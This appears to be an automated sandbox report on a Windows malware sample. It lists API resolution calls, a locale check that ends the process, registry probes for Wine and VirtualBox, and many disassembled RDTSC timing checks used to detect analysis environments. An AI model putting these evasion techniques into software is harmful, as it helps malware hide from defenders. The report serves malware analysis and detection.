                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004D9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004D9BB0

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-36337
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 928420 second address: 92843E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FBD38D4D526h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B282 second address: 92B2DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnc 00007FBD3853A9A4h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 jmp 00007FBD3853A98Dh 0x00000019 pop eax 0x0000001a mov dword ptr [esp+04h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FBD3853A993h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B2DB second address: 92B2E5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FBD38D4D51Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B500 second address: 92B52D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c sub dword ptr [ebp+122D2A77h], esi 0x00000012 popad 0x00000013 push 00000000h 0x00000015 add di, A8D6h 0x0000001a push B34648A0h 0x0000001f push eax 0x00000020 push edx 0x00000021 ja 00007FBD3853A98Ch 0x00000027 jo 00007FBD3853A986h 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B52D second address: 92B548 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD38D4D527h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B548 second address: 92B54C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B54C second address: 92B5D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 4CB9B7E0h 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007FBD38D4D518h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 jmp 00007FBD38D4D524h 0x0000002e push 00000003h 0x00000030 mov ch, bh 0x00000032 push 00000000h 0x00000034 mov edi, dword ptr [ebp+122D38F2h] 0x0000003a push 00000003h 0x0000003c jnl 00007FBD38D4D519h 0x00000042 push 9268FF2Bh 0x00000047 push esi 0x00000048 push edx 0x00000049 jc 00007FBD38D4D516h 0x0000004f pop edx 0x00000050 pop esi 0x00000051 add dword ptr [esp], 2D9700D5h 0x00000058 mov dword ptr [ebp+122D1B43h], edi 0x0000005e lea ebx, dword ptr [ebp+124511D4h] 0x00000064 cmc 0x00000065 mov esi, ebx 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c push ebx 0x0000006d pop ebx 0x0000006e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B5D2 second address: 92B5DC instructions: 0x00000000 rdtsc 0x00000002 js 00007FBD3853A986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B617 second address: 92B61D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B61D second address: 92B652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007FBD3853A98Dh 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D2A21h], ebx 0x00000018 call 00007FBD3853A989h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 je 00007FBD3853A986h 0x00000026 push eax 0x00000027 pop eax 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B652 second address: 92B663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007FBD38D4D516h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B663 second address: 92B681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FBD3853A986h 0x0000000a popad 0x0000000b pop edi 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 jmp 00007FBD3853A98Ah 0x00000018 pop edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B681 second address: 92B72E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jl 00007FBD38D4D516h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [eax] 0x00000010 pushad 0x00000011 jmp 00007FBD38D4D51Eh 0x00000016 pushad 0x00000017 jmp 00007FBD38D4D521h 0x0000001c jns 00007FBD38D4D516h 0x00000022 popad 0x00000023 popad 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 jmp 00007FBD38D4D51Ch 0x0000002d pop eax 0x0000002e sub dword ptr [ebp+122D1891h], esi 0x00000034 push 00000003h 0x00000036 cmc 0x00000037 push 00000000h 0x00000039 mov dword ptr [ebp+122D36CBh], edx 0x0000003f mov si, 4A5Bh 0x00000043 push 00000003h 0x00000045 mov dword ptr [ebp+122D2A4Ch], eax 0x0000004b call 00007FBD38D4D519h 0x00000050 jmp 00007FBD38D4D51Dh 0x00000055 push eax 0x00000056 jnc 00007FBD38D4D52Eh 0x0000005c jmp 00007FBD38D4D528h 0x00000061 mov eax, dword ptr [esp+04h] 0x00000065 pushad 0x00000066 push ecx 0x00000067 pushad 0x00000068 popad 0x00000069 pop ecx 0x0000006a ja 00007FBD38D4D51Ch 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92B72E second address: 92B76D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push edi 0x00000008 pushad 0x00000009 jns 00007FBD3853A986h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push edi 0x00000018 jc 00007FBD3853A988h 0x0000001e pop edi 0x0000001f pop eax 0x00000020 mov edx, dword ptr [ebp+122D3BAEh] 0x00000026 lea ebx, dword ptr [ebp+124511DFh] 0x0000002c mov dx, di 0x0000002f mov si, ax 0x00000032 xchg eax, ebx 0x00000033 push ebx 0x00000034 pushad 0x00000035 js 00007FBD3853A986h 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B43F second address: 94B443 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B596 second address: 94B5B2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007FBD3853A997h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B745 second address: 94B752 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B752 second address: 94B758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94B758 second address: 94B763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBD38D4D516h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BA66 second address: 94BA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94BD59 second address: 94BD67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C166 second address: 94C16C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C16C second address: 94C1AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38D4D522h 0x00000007 je 00007FBD38D4D516h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push edi 0x00000010 push edi 0x00000011 pop edi 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 pop ecx 0x00000016 push ebx 0x00000017 jmp 00007FBD38D4D528h 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9432BD second address: 9432C3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9432C3 second address: 9432EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD38D4D523h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FBD38D4D522h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9432EC second address: 943328 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 js 00007FBD3853A986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FBD3853A993h 0x00000014 jne 00007FBD3853A988h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FBD3853A990h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 943328 second address: 94332E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E7D9 second address: 91E7DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 91E7DF second address: 91E7E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C446 second address: 94C44A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94C44A second address: 94C46C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FBD38D4D527h 0x0000000c pop edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CB52 second address: 94CB6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3853A992h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CC9E second address: 94CCA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CDDF second address: 94CDFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FBD3853A995h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CDFD second address: 94CE02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CE02 second address: 94CE34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBD3853A992h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jbe 00007FBD3853A997h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CE34 second address: 94CE44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FBD38D4D516h 0x0000000a jnc 00007FBD38D4D516h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94CE44 second address: 94CE48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 94D0F3 second address: 94D0F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BDEF second address: 90BE0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FBD3853A98Bh 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f jp 00007FBD3853A986h 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BE0F second address: 90BE13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BE13 second address: 90BE17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90BE17 second address: 90BE32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FBD38D4D516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FBD38D4D51Bh 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954B5B second address: 954B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 954B60 second address: 954B75 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBD38D4D520h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92022B second address: 920246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD3853A997h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959B39 second address: 959B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959B3F second address: 959B4F instructions: 0x00000000 rdtsc 0x00000002 jl 00007FBD3853A988h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959CD1 second address: 959CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FBD38D4D516h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959CDE second address: 959CF3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FBD3853A98Ch 0x00000008 jnl 00007FBD3853A986h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 959CF3 second address: 959CFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FBD38D4D516h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95C5D6 second address: 95C5DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95CC53 second address: 95CC57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D13E second address: 95D143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D143 second address: 95D148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D1D1 second address: 95D245 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBD3853A997h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FBD3853A98Ah 0x0000000e popad 0x0000000f mov dword ptr [esp], ebx 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FBD3853A988h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000016h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c jnc 00007FBD3853A98Ch 0x00000032 mov si, 06F4h 0x00000036 nop 0x00000037 jmp 00007FBD3853A98Bh 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007FBD3853A98Dh 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D4D6 second address: 95D4E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D6F5 second address: 95D6FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D6FB second address: 95D709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FBD38D4D51Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D7F0 second address: 95D7F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D7F4 second address: 95D813 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBD38D4D516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FBD38D4D51Ah 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007FBD38D4D516h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95D813 second address: 95D884 instructions: 0x00000000 rdtsc 0x00000002 js 00007FBD3853A986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FBD3853A993h 0x00000010 jnl 00007FBD3853A986h 0x00000016 popad 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ebx 0x0000001c call 00007FBD3853A988h 0x00000021 pop ebx 0x00000022 mov dword ptr [esp+04h], ebx 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc ebx 0x0000002f push ebx 0x00000030 ret 0x00000031 pop ebx 0x00000032 ret 0x00000033 jl 00007FBD3853A99Bh 0x00000039 jmp 00007FBD3853A995h 0x0000003e xchg eax, ebx 0x0000003f jl 00007FBD3853A994h 0x00000045 push eax 0x00000046 push edx 0x00000047 js 00007FBD3853A986h 0x0000004d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DE0F second address: 95DE14 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95F7E7 second address: 95F7F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95F7F6 second address: 95F7FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960332 second address: 96033D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FBD3853A986h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9600CB second address: 9600D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96033D second address: 960343 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960343 second address: 960347 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9600D1 second address: 9600D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9600D6 second address: 9600E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FBD38D4D516h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960BA2 second address: 960BA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960DCB second address: 960E38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FBD38D4D518h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 and esi, 2C50B4D4h 0x0000002b and edi, dword ptr [ebp+122D2A82h] 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebx 0x00000036 call 00007FBD38D4D518h 0x0000003b pop ebx 0x0000003c mov dword ptr [esp+04h], ebx 0x00000040 add dword ptr [esp+04h], 0000001Ah 0x00000048 inc ebx 0x00000049 push ebx 0x0000004a ret 0x0000004b pop ebx 0x0000004c ret 0x0000004d mov edi, dword ptr [ebp+122D38EAh] 0x00000053 push 00000000h 0x00000055 mov si, 2DA5h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960E38 second address: 960E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 960E3C second address: 960E42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9618D0 second address: 9618D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9618D4 second address: 9618DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
